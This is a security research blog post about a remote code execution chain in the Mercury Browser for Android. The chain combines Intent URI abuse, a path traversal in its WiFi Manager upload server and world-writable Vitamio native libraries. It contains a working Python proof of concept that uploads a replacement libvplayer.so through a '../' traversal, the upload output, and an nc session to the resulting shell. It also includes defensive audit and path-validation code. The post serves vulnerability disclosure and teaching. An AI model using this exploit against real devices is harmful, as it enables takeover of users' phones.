Mercury Browser for Android RCE Redux


Overview

In my previous post about this browser, I covered how the insecure parsing of the Intent URI scheme can be abused to invoke the private WiFi Manager feature, and how a path traversal vulnerability in the custom web server used by the WiFi Manager feature can be exploited to read arbitrary files from the browser's data directory.

Now we are going to cover how to achieve a fatality against the Mercury Browser for Android by gaining code execution.

Fatality

Remote Code Execution

The crux of the code execution issue in the Mercury Browser for Android is its use of the Vitamio SDK. Jake Van Dyke from NowSecure has already covered the vulnerability in this SDK, so be sure to read that post before continuing.

We can see that the Mercury Browser bundles Vitamio's shared library, and we don't have to guess which Activities use the SDK:

[2015-10-11 15:42:46.336020] File : lib/armeabi/libvinit.so
[2015-10-11 15:46:13.816848] Activity : com.ilegendsoft.mercury.ui.activities.filemanager.music.MusicPlayListActivity
[2015-10-11 15:46:13.816858] Activity : com.ilegendsoft.mercury.ui.activities.filemanager.music.MusicPlayerActivity
[2015-10-11 15:46:13.816867] Activity : com.ilegendsoft.mercury.ui.activities.filemanager.music.MusicAddActivity
[2015-10-11 15:46:13.816876] Activity : com.ilegendsoft.mercury.ui.activities.filemanager.video.viewer.VideoViewerActivity

If we open up an mp4 from the Mercury Browser's file manager, we get the following output:

Initialization

I/Vitamio[Init](13507): Extracting....
I/Vitamio[Init](13507): 71/libOMX.11.so
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libOMX.11.so
I/Vitamio[Init](13507): Extracting....
I/Vitamio[Init](13507): 71/libOMX.14.so
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libOMX.14.so
I/Vitamio[Init](13507): Extracting....
I/Vitamio[Init](13507): 71/libOMX.18.so
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libOMX.18.so
I/Vitamio[Init](13507): Extracting....
I/Vitamio[Init](13507): 71/libOMX.9.so
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libOMX.9.so
I/Vitamio[Init](13507): Extracting....
I/Vitamio[Init](13507): 71/libstlport_shared.so
I/Vitamio[Init](13507): /data/data/com.ilegendsoft.mercury/libs/libstlport_shared.so
I/Vitamio[Init](13507): Extracting....

Sure enough, as described in NowSecure's post, the extracted libraries are world-writable (-rw-rw-rw-, mode 0666), which makes them our targets: any process running as any uid on the device can overwrite a library that the browser will later load.

[email protected]:/data/data/com.ilegendsoft.mercury/libs # ls -la  
-rw------- u0_a115  u0_a115         2 2015-10-11 15:49 .lock
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.11.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.14.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.18.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.9.so
-rw-rw-rw- u0_a115  u0_a115   8019344 2015-10-11 15:49 libffmpeg.so
-rw-rw-rw- u0_a115  u0_a115    361788 2015-10-11 15:49 libstlport_shared.so
-rw-rw-rw- u0_a115  u0_a115     13508 2015-10-11 15:49 libvao.0.so
-rw-rw-rw- u0_a115  u0_a115    276848 2015-10-11 15:49 libvplayer.so
-rw-rw-rw- u0_a115  u0_a115    165776 2015-10-11 15:49 libvscanner.so
-rw-rw-rw- u0_a115  u0_a115     17660 2015-10-11 15:49 libvvo.0.so
-rw-rw-rw- u0_a115  u0_a115     17600 2015-10-11 15:49 libvvo.7.so
-rw-rw-rw- u0_a115  u0_a115     17600 2015-10-11 15:49 libvvo.8.so
-rw-rw-rw- u0_a115  u0_a115     13504 2015-10-11 15:49 libvvo.9.so
-rw-rw-rw- u0_a115  u0_a115     13504 2015-10-11 15:49 libvvo.j.so
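The permission bits in that listing are the whole finding, so it is worth having a check that reads them mechanically rather than by eye. The following is an added audit script written for this post (not code from the original, from Mercury, or from Vitamio). It parses the Android toolbox `ls -la` format shown above (mode, owner, group, size, date, time, name), converts the symbolic mode to bits, and reports every shared object that carries the other-write bit; the sample listing is copied from the output above, and the function names are my own.

```python
import re
from typing import Dict, List

# Listing copied from the `ls -la` output above (Android toolbox format:
# mode owner group size date time name). .lock is the only entry that is
# not world-writable.
SAMPLE_LISTING = """\
-rw------- u0_a115  u0_a115         2 2015-10-11 15:49 .lock
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.11.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.14.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.18.so
-rw-rw-rw- u0_a115  u0_a115     70780 2015-10-11 15:49 libOMX.9.so
-rw-rw-rw- u0_a115  u0_a115   8019344 2015-10-11 15:49 libffmpeg.so
-rw-rw-rw- u0_a115  u0_a115    361788 2015-10-11 15:49 libstlport_shared.so
-rw-rw-rw- u0_a115  u0_a115     13508 2015-10-11 15:49 libvao.0.so
-rw-rw-rw- u0_a115  u0_a115    276848 2015-10-11 15:49 libvplayer.so
-rw-rw-rw- u0_a115  u0_a115    165776 2015-10-11 15:49 libvscanner.so
-rw-rw-rw- u0_a115  u0_a115     17660 2015-10-11 15:49 libvvo.0.so
-rw-rw-rw- u0_a115  u0_a115     17600 2015-10-11 15:49 libvvo.7.so
-rw-rw-rw- u0_a115  u0_a115     17600 2015-10-11 15:49 libvvo.8.so
-rw-rw-rw- u0_a115  u0_a115     13504 2015-10-11 15:49 libvvo.9.so
-rw-rw-rw- u0_a115  u0_a115     13504 2015-10-11 15:49 libvvo.j.so
"""

# One toolbox `ls -la` line: type+mode, owner, group, size, date, time, name.
LS_LINE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\S+\s+\S+\s+\d+\s+\S+\s+\S+\s+(?P<name>.+?)\s*$"
)


def mode_to_octal(mode: str) -> int:
    """Convert a symbolic mode such as '-rw-rw-rw-' to its rwx bits (0o666)."""
    value = 0
    for i, ch in enumerate(mode[1:10]):
        # r, w and x set their bit; lowercase s/t also imply the execute bit,
        # while uppercase S/T mean setuid/setgid/sticky without execute.
        if ch in "rwxst":
            value |= 1 << (8 - i)
    return value


def parse_listing(listing: str) -> Dict[str, int]:
    """Map each file name in a toolbox `ls -la` listing to its permission bits."""
    entries: Dict[str, int] = {}
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if m:
            entries[m.group("name")] = mode_to_octal(m.group("mode"))
    return entries


def find_world_writable_libs(listing: str) -> List[str]:
    """Return the shared objects (.so) that any uid on the device could overwrite."""
    return sorted(
        name
        for name, bits in parse_listing(listing).items()
        if name.endswith(".so") and bits & 0o002
    )


if __name__ == "__main__":
    for lib in find_world_writable_libs(SAMPLE_LISTING):
        print("world-writable native library:", lib)
```

Run against the listing above it reports all fourteen `.so` files and ignores `.lock`; on a device you would feed it `adb shell ls -la` output for the app's `libs` directory after the player has initialised. The defensive fix on the app side is the complementary one: extract native code with mode 0600 into the app-private directory and never `System.load()` anything that another uid could have replaced.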

So now we can chain the original vulnerabilities to:

  • Invoke the WiFi Manager Activity through the Intent URI scheme abuse

  • Exploit the path traversal vulnerability in the custom web server to overwrite a target shared library

Below is the PoC code for exploiting the path traversal vulnerability:

import requests
import sys

def do_exploit():
    # The target browser, with the WiFi Manager web server listening on port 8888
    url = "http://10.174.90.159:8888/doupload?dir="
    # Traverse out of the upload directory into the extracted Vitamio libraries,
    # followed by the session id the upload handler expects
    path_traversal = "../../../../data/data/com.ilegendsoft.mercury/libs/&id=15c516f6-cc7d-4c5b-8e40-6a1200e7b963"
    headers = {"Referer": "http://192.168.225.207:8888/"}

    # The key is the file name the server writes; the value is the local payload
    with open("libvplayer.so", "rb") as payload:
        files = {"libvplayer.0.so": payload}
        print("[*] Uploading shared library : libvplayer.so")
        r = requests.post("".join([url, path_traversal]), files=files, headers=headers)

    if r.status_code == 200:
        print("[*] Successfully uploaded")
        print("[*] {0}".format(r.text))
    else:
        print("[*] Could not upload")

if __name__ == "__main__":
    try:
        do_exploit()
    except KeyboardInterrupt:
        sys.exit(0)

After the WiFi Manager Activity has been invoked, we can upload our payload:

└[~/R&D/mercury]> python upload_rce.py
[*] Uploading shared library : libvplayer.so
[*] Successfully uploaded
[*] ok
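The upload handler accepts that `dir` value because it never canonicalises the requested directory or checks where the result ends up. What the check should look like, as an added Python illustration written for this post (the Mercury Browser's own web server is Java code that I am not reproducing; the upload root, the `&id=` parameter handling and the function names are assumptions): resolve the requested directory against the upload root, require the canonical result to stay under that root, and refuse file names that carry path components, so that both the `../../../../data/data/...` directory above and a file name like `../libvplayer.so` are rejected.

```python
import os

# Hypothetical upload root for the WiFi Manager's file transfer feature;
# the real app's path is not known from this post.
UPLOAD_ROOT = "/sdcard/Download/mercury_uploads"


def safe_upload_path(root: str, requested_dir: str, filename: str) -> str:
    """Return the absolute destination for an upload, or raise ValueError.

    requested_dir is the client-controlled `dir` value; filename is the
    client-controlled multipart field name. Neither may escape `root`.
    """
    # A client may choose only a bare file name; '..', '.' and anything
    # containing a separator are refused outright.
    if not filename or filename in (".", "..") or os.path.basename(filename) != filename:
        raise ValueError("invalid file name: %r" % filename)

    root_real = os.path.realpath(root)
    # Join first, then canonicalise: '..' segments collapse here, and an
    # absolute requested_dir discards the root entirely (os.path.join semantics).
    dest_dir = os.path.realpath(os.path.join(root_real, requested_dir))

    # The canonical destination must be the root itself or strictly inside it.
    # commonpath works on whole path components, so "/sdcard/Download/mercury_uploads2"
    # does not pass as a child of "/sdcard/Download/mercury_uploads".
    if os.path.commonpath([root_real, dest_dir]) != root_real:
        raise ValueError("path traversal rejected: %r" % requested_dir)

    return os.path.join(dest_dir, filename)


def is_allowed(root: str, requested_dir: str, filename: str) -> bool:
    """Convenience wrapper: True if the upload would be accepted."""
    try:
        safe_upload_path(root, requested_dir, filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # The traversal value from the PoC above, with its trailing query fragment
    # already split off by the (assumed) parameter parser
    traversal = "../../../../data/data/com.ilegendsoft.mercury/libs/"
    print("benign upload allowed:", is_allowed(UPLOAD_ROOT, "music", "song.mp3"))
    print("traversal allowed:", is_allowed(UPLOAD_ROOT, traversal, "libvplayer.0.so"))
```

Two details matter in practice. The check runs on the canonical path, not on the raw string, so encoding tricks and `a/../../b` variants collapse before comparison; and the file name is validated separately from the directory, because a permissive directory check is no help if the multipart field name itself can carry `../`.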

Now let's load up our mp4 again and see what happens. I didn't spend too much time making this completely reliable, so some things crash when our custom payload is loaded. However, we still get a shell.

Crash

└[~/R&D/mercury]> nc 10.174.90.159 6666
id
uid=10113(u0_a113) gid=10113(u0_a113) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),50113(all_a113) context=u:r:untrusted_app:s0